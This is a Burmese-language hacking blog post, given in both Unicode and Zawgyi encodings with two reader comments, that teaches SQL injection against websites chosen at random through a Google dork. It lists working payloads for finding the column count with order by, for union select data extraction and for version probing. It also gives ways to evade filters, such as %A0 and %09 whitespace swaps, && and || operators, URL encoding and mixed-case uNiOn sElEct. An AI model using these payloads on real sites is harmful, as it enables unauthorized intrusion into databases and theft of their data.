Monday, October 22, 2018

Black Listed in SQL Injection

October 22, 2018    2 comments

[Unicode]


Black Listed in SQL Injection



SQL Injection ထိုးသူတိုင်းကြုံ့ဖူးတယ်ထင်ပါတယ်
အရင်ဆုံးထိုးမယ်ဆိုအရင်းဆုံး Dork လေးနဲ့လိုက်ရှာပါတယ် ကျွန်တော်ဆိုရင်ပြောပါတယ်
ဥပမာ google ကနေ inurl:index.php?id= (dork) သုံးပြီးပေါ့
ပြီးရင် ပေါက်တဲ့ဆိုက်ကို random ရွေးတယ်ပေါ့
ဥပမာ example.com/index.php?id=1 ပဲထားပါတော့ ပြီးရင် ' လေးထည့်ကြည့်တယ်ပေါ့
အကယ်လို့ပေါက်ခဲ့ရင်
'You have an error in your SQL syntax...' ဘာညာတိတော့ပု biggrin
အဲ့ query ကို break လုပ်ပြီးသွားရင် ပြန်ကလိပေါ့ --+ တို့ # နဲ့လဲအစဉ်ပြေတတ်ပါတယ် biggrin
နောက် ../id=1' order by 1 ပြီး တူး, တရီးအဲ့လို့နဲ့ error တက်တဲ့အထိစမ်းတာပေါ့
ပြောရရင် 5 မှာ unknown coloumn တက်ရင် 4 အထိရှိတယ်ပေါ့
ပြီးရင် union all select သုံးကြတယ်ပေါ့
../id=-1 union all select 1,2,3 --+ (အဲ့မှာ id= လေးက 1 မှာ negative value အပြင် no. အကြီးကြီးတွေထည့်လဲရပါတယ် like 999999)
နောက် database() တို့ version() or @@version တို့နဲ့ ဘာညာပေါ့

ထားပါတော့
အခုပြောချင်တာက ကျွန်တော်တို့ url ကနေထိုးကြတဲ့အခါတခါတလေကျရင် Space , Comment , Union , Select , AND , OR တို့က black listed ထားတာဖြစ်တတ်ပါတယ်
ဒီတော့ဘာဖြစ်သလဲဆိုတော့ URL မှာရေးရင်အလုပ်မလုပ်တော့ဘူးပေါ့

အဲ့ပြသနာကဒီလိုဗျ ပြောရရင် vulnerability ဖြစ်တယ်ဆို order by ကိုအသုံးတာသိမှာပါ
ဒီတော့ OR က black listed ခံထားရတော့ order by 1 ဆို der by 1 ဖြစ်ကုန်ရော
ဘာမှန်းကိုမသိတော့တာ အဲ့တော့ omg

ဒီလိုပဲ space black listed ခံထားရရင်လဲအတူတူပါပဲ
union all select 1,2,3 ဆိုရင် unionallselect1,2,3 ဖြစ်ကုန်ရော
တူတူပါပဲ အလုပ်မလုပ်တော့ပါဘူး
ဒီတော့ space ကိုဖြေရှင်းနည်းပြောချင်ပါတယ်
ဒီလိုလေးရေးပေါ့
space နေရာမှာ random character တွေထည့်ပြီးရေးလို့ရပါတယ်
ပြောရရင်
.../id=1'%A0union%A0all%A0select%A01,2,3...
space နေရာမှာ random character ကိုနေရာယူပြီးရေးလိုက်ခြင်းသာဖြစ်ပါတယ်
ကြည့်ရတာတော့ခေါင်းမူးတာပေါ့ blink
%A0 ပဲရှိတာမပာုတ်ပါဘူး ဒီကောင်တွေလဲရပါသေးတယ် %09 , %0A , %0C , %0D , %0B roflmao

ဒီလိုရေးလဲရပါသေးတယ် ... နောက်တစ်နည်းပေါ့
union(select(1),(2),(3)); အဲ့သလိုဆိုလဲအလုပ်လုပ်မှာဖြစ်ပါတယ်......

ဒါဆိုနောက်တစ်ခုဆက်ပါတယ် OR , AND ကို black listed ထားရင်ပေါ့
.../id=1' order by 1 --+ လို့ရေးရင် OR ကို filter လုပ်လိုက်တော့ der by 1 ဖြစ်ကော အဲ့တော့ဘာပြောလို့ပြောမှန်းကိုမသိ omg omg
AND ကိုအသုံးပြုလဲထိုအတိုင်းဖြစ်ကောပေါ့
blink blink blink blink ဒီတော့ solution က ????? blink blink blink blink
|| ဒါမှမပာုတ် && နဲ့စမ်းလို့ရပါတယ်
ဒီလိုလေးပါ id=1' AND 1 --+ , id=1' OR 1 --+ တို့အစား id=1' && 1 --+ , id=1' || 1 --+ ပေါ့
နောက်တစ်ခုက encode လုပ်ပြီးရေးရင်လဲရပါတယ်
အဲ့အတွက် ဒီဆိုက်လေးကိုသွားလိုက်ပါ (http://www.url-encode-decode.com/)
အဲ့ရောက်ရင် encode ကိုရွေး && ဆိုရင် %26%26 ပါ || ဆိုရင် %7C%7C ပေါ့

So How About Union & Select is black listed??
blink blink unsure unsure

../id=1 union select 1,2,3%26%26 '1 ဒါကပုံမှန်ပေါ့ enter ခေါက်လိုက်ရင် အလုပ်မလုပ်ဖူးဗျ union နဲ့ select ကကျန်ခဲ့ရောဒီတော့
အာ့ဆိုဒီလိုစမ်းမယ်ဗျာ
../id=1%A0union%A0select%A01,2,3%26%26%271 ဒါလဲမလုပ်ဖူးဗျ အာ့ဆို.... blink
ဒီလိုလေးဖြေရှင်းလို့ရပါတယ် ../id=1%A0uNiOn%A0sElEct%A01,2,3%26%26%271 victorie

ဒီလောက်ဆို Black Listed ကိုဘယ်လိုရှောင်တိန်းလို့ရတယ်ဆိုတာသိလောက်ပြီထင်ပါတယ်
ကျွန်တော်ကိုယ်တိုင်လည်း begginer တစ်ယောက်ပါပဲ
နောက် ကျွန်တော့်လိုတခြား begginer တွေအနေနဲ့လဲ tools တွေကိုအားမကိုးသင့်ပါဖူး like Havij
ဘာလို့လဲဆိုတော့ concept ကိုနားမလည်ကြတော့လို့ပါ
manual ထိုးကြည့်ပါပာုတ်ပါတယ်ခက်တာတော့ခက်တာပေါ့အစဆိုတော့ (ကျွန်တော်အပါအဝင်ပါပဲ)
ရေးသားရာမှာအမှားပါတယ်.... နားမလည်တာဆို ကျွန်တော်ညံဖြင်းလို့သာဖြစ်ပါတယ်

thanks for reading
Cyko Rat


[Zawgyi]Black Listed in SQL Injection

Black Listed in SQL Injection



SQL Injection ထိုးသူတိုင္းၾကံဳ ့ဖူးတယ္ထင္ပါတယ္
အရင္ဆံုးထိုးမယ္ဆိုအရင္းဆံုး Dork ေလးနဲ ့လိုက္ရွာပါတယ္ ကြ်န္ေတာ္ဆိုရင္ေျပာပါတယ္
ဥပမာ google ကေန inurl:index.php?id= (dork) သံုးျပီးေပါ့
ျပီးရင္ ေပါက္တဲ့ဆိုက္ကို random ေရြးတယ္ေပါ့
ဥပမာ example.com/index.php?id=1 ပဲထားပါေတာ့ ျပီးရင္ ' ေလးထည့္ၾကည့္တယ္ေပါ့
အကယ္လို ့ေပါက္ခဲ့ရင္
'You have an error in your SQL syntax...' ဘာညာတိေတာ့ပု biggrin
အဲ့ query ကို break လုပ္ျပီးသြားရင္ ျပန္ကလိေပါ့ --+ တို ့ # နဲ ့လဲအစဥ္ေျပတတ္ပါတယ္ biggrin
ေနာက္ ../id=1' order by 1 ျပီး တူး, တရီးအဲ့လို ့နဲ ့ error တက္တဲ့အထိစမ္းတာေပါ့
ေျပာရရင္ 5 မွာ unknown coloumn တက္ရင္ 4 အထိရွိတယ္ေပါ့
ျပီးရင္ union all select သံုးၾကတယ္ေပါ့
../id=-1 union all select 1,2,3 --+ (အဲ့မွာ id= ေလးက 1 မွာ negative value အျပင္ no. အၾကီးၾကီးေတြထည့္လဲရပါတယ္ like 999999)
ေနာက္ database() တို ့ version() or @@version တို ့နဲ ့ ဘာညာေပါ့

ထားပါေတာ့
အခုေျပာခ်င္တာက ကြ်န္ေတာ္တို ့ url ကေနထိုးၾကတဲ့အခါတခါတေလက်ရင္ Space , Comment , Union , Select , AND , OR တို ့က black listed ထားတာျဖစ္တတ္ပါတယ္
ဒီေတာ့ဘာျဖစ္သလဲဆိုေတာ့ URL မွာေရးရင္အလုပ္မလုပ္ေတာ့ဘူးေပါ့

အဲ့ျပသနာကဒီလိုဗ် ေျပာရရင္ vulnerability ျဖစ္တယ္ဆို order by ကိုအသံုးတာသိမွာပါ
ဒီေတာ့ OR က black listed ခံထားရေတာ့ order by 1 ဆို der by 1 ျဖစ္ကုန္ေရာ
ဘာမွန္းကိုမသိေတာ့တာ အဲ့ေတာ့ omg

ဒီလိုပဲ space black listed ခံထားရရင္လဲအတူတူပါပဲ
union all select 1,2,3 ဆိုရင္ unionallselect1,2,3 ျဖစ္ကုန္ေရာ
တူတူပါပဲ အလုပ္မလုပ္ေတာ့ပါဘူး
ဒီေတာ့ space ကိုေျဖရွင္းနည္းေျပာခ်င္ပါတယ္
ဒီလိုေလးေရးေပါ့
space ေနရာမွာ random character ေတြထည့္ျပီးေရးလို ့ရပါတယ္
ေျပာရရင္
.../id=1'%A0union%A0all%A0select%A01,2,3...
space ေနရာမွာ random character ကိုေနရာယူျပီးေရးလိုက္ျခင္းသာျဖစ္ပါတယ္
ၾကည့္ရတာေတာ့ေခါင္းမူးတာေပါ့ blink
%A0 ပဲရွိတာမပာုတ္ပါဘူး ဒီေကာင္ေတြလဲရပါေသးတယ္ %09 , %0A , %0C , %0D , %0B roflmao

ဒီလိုေရးလဲရပါေသးတယ္ ... ေနာက္တစ္နည္းေပါ့
union(select(1),(2),(3)); အဲ့သလိုဆိုလဲအလုပ္လုပ္မွာျဖစ္ပါတယ္......

ဒါဆိုေနာက္တစ္ခုဆက္ပါတယ္ OR , AND ကို black listed ထားရင္ေပါ့
.../id=1' order by 1 --+ လို ့ေရးရင္ OR ကို filter လုပ္လိုက္ေတာ့ der by 1 ျဖစ္ေကာ အဲ့ေတာ့ဘာေျပာလို ့ေျပာမွန္းကိုမသိ omg omg
AND ကိုအသံုးျပဳလဲထုိအတိုင္းျဖစ္ေကာေပါ့
blink blink blink blink ဒီေတာ့ solution က ????? blink blink blink blink
|| ဒါမွမပာုတ္ && နဲ ့စမ္းလို ့ရပါတယ္
ဒီလိုေလးပါ id=1' AND 1 --+ , id=1' OR 1 --+ တို ့အစား id=1' && 1 --+ , id=1' || 1 --+ ေပါ့
ေနာက္တစ္ခုက encode လုပ္ျပီးေရးရင္လဲရပါတယ္
အဲ့အတြက္ ဒီဆိုက္ေလးကိုသြားလိုက္ပါ (http://www.url-encode-decode.com/)
အဲ့ေရာက္ရင္ encode ကိုေရြး && ဆိုရင္ %26%26 ပါ || ဆိုရင္ %7C%7C ေပါ့

So How About Union & Select is black listed??
blink blink unsure unsure

../id=1 union select 1,2,3%26%26 '1 ဒါကပံုမွန္ေပါ့ enter ေခါက္လိုက္ရင္ အလုပ္မလုပ္ဖူးဗ် union နဲ ့ select ကက်န္ခဲ့ေရာဒီေတာ့
အာ့ဆိုဒီလိုစမ္းမယ္ဗ်ာ
../id=1%A0union%A0select%A01,2,3%26%26%271 ဒါလဲမလုပ္ဖူးဗ် အာ့ဆို.... blink
ဒီလိုေလးေျဖရွင္းလို ့ရပါတယ္ ../id=1%A0uNiOn%A0sElEct%A01,2,3%26%26%271 victorie

ဒီေလာက္ဆို Black Listed ကိုဘယ္လိုေရွာင္တိန္းလို ့ရတယ္ဆိုတာသိေလာက္ျပီထင္ပါတယ္
ကြ်န္ေတာ္ကိုယ္တိုင္လည္း begginer တစ္ေယာက္ပါပဲ
ေနာက္ ကြ်န္ေတာ့္လိုတျခား begginer ေတြအေနနဲ ့လဲ tools ေတြကိုအားမကိုးသင့္ပါဖူး like Havij
ဘာလို ့လဲဆိုေတာ့ concept ကိုနားမလည္ၾကေတာ့လို ့ပါ
manual ထိုးၾကည့္ပါပာုတ္ပါတယ္ခက္တာေတာ့ခက္တာေပါ့အစဆိုေတာ့ (ကြ်န္ေတာ္အပါအ၀င္ပါပဲ)
ေရးသားရာမွာအမွားပါတယ္.... နားမလည္တာဆို ကြ်န္ေတာ္ညံျဖင္းလို ့သာျဖစ္ပါတယ္


Cyko Rat


2 comments:

  1. Minn Satt Maung MaungOctober 28, 2018 at 9:59 AM

    ဟုတ္​ ခုမွ နားလည္​ေတာ့တယ္​
    ေက်းဇူး ဆရာ 😁

    ReplyDelete
    Replies
    1. UnknownOctober 28, 2018 at 10:33 AM

      ေနာက္လဲထပ္ၿပီးတင္ေပးပါမယ္
      လိုအပ္တာ႐ွိလည္းေျပာေပးခဲ့ပါခင္ဗ်

      Delete

Subscribe to: Post Comments (Atom)